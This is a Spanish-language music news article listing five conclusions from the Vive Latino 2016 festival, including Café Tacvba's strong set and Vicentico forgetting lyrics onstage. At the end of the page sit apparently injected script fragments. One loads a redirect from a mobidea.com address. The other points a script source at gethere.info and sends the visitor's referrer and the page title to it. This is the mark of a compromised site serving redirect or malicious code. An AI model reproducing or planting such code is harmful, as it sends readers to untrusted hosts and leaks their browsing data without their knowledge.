5 conclusiones que dejó el Vive Latino 2016

Por Manuel Pineda

Casi en punto de las 12:30 am del lunes 25 de abril, sonó la última nota musical de la banda Prodigy, las luces se apagaban mientras de fondo se escuchaba una y otra vez la guitarra. Era el momento exacto en que se terminaba la edición 2016 del Vive Latino.

Fieles al llamado, miles y miles de jóvenes asistieron a sus cita con la historia, su historia, su momento. Ahí estaban hombro a hombro hasta el final, resistiendo el cansancio, las desveladas, la cruda o la borrachera.

Y se quedaron hasta que poco a poco iban desocupando el lugar que los cobijó, que los hizo felices.

Después de todo, es obligación de los jóvenes ser felices, rendir culto a sus bandas, a su momento histórico.

Al final quedan reflexiones, cada uno de los asistentes tendrán las suyas, y nosotros como medio de comunicación, también. Y esto es lo que dejó el Vive Latino para nosotros.

La “Ñ” sobre todas las cosas

El español fue el común denominador del festival, más del 90% de las bandas tienen al español como lengua materna, es evidente que los organizadores quisieron regresar a las raíces, basta ver el cartel para darse cuenta. El concepto del festival dio vuelta la cara a lo que comenzaba a olvidarse, que al final de cuentas es un festival latinoamericano, y en esta ocasión fue evidente.

La apuesta por bandas nuevas

Pueden llamarnos ignorantes o rucos, pero fue evidente que en esta ocasión, el Festival apostó por las propuestas más frescas e innovadoras de latinoamérica, lo cual está muy bien, pues creemos que es el gran foro para que nuevas bandas se den a conocer, y otras se consoliden o simplemente recojan los frutos de muchos años de trabajo.

Menos nostalgia menos banda

En esta ocasión las bandas participantes evitaron en la medida de los posible invitar a grupos de música de banda o artistas del pasado para acompañarse en el escenario, con algunas excepciones como The Chamanas cantando con el vocalista de Los Ángeles Negros.

Café Tacvba, otro nivel

A pesar de que muchas bandas lograron llevar al público a despeinarse, bailar, brincar y deschongarse, fue Café Tacvba, quienes simplemente demostraron por que llevan tanto tiempo en la escena y son una de las bandas más grandes de México. Se nota la madurez, la experiencia y el modo en que se complementan en el escenario. Simplemente fue uno de los mejores momentos del Vive y será recordado por mucho tiempo.

El gran “oso” 

Rubén Albarrán de Café Tacvba anuncia a un invitado especial cuando comienza a sonar “Ojalá que llueva café” cuando aparece la figura de Vicentico, ¡qué momento! Una rola poderosa, sabrosa, listo para que los dos se luzcan, la banda emocionada y Vicentico no sabe la letra. En un momento se nos figuró a cuando nuestro editor anda borracho e intenta cantar canciones que nunca se sabe. Pero bueno este es el Vive Latino y hasta esos detalles son sensacionales.

 

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||||
Comentarios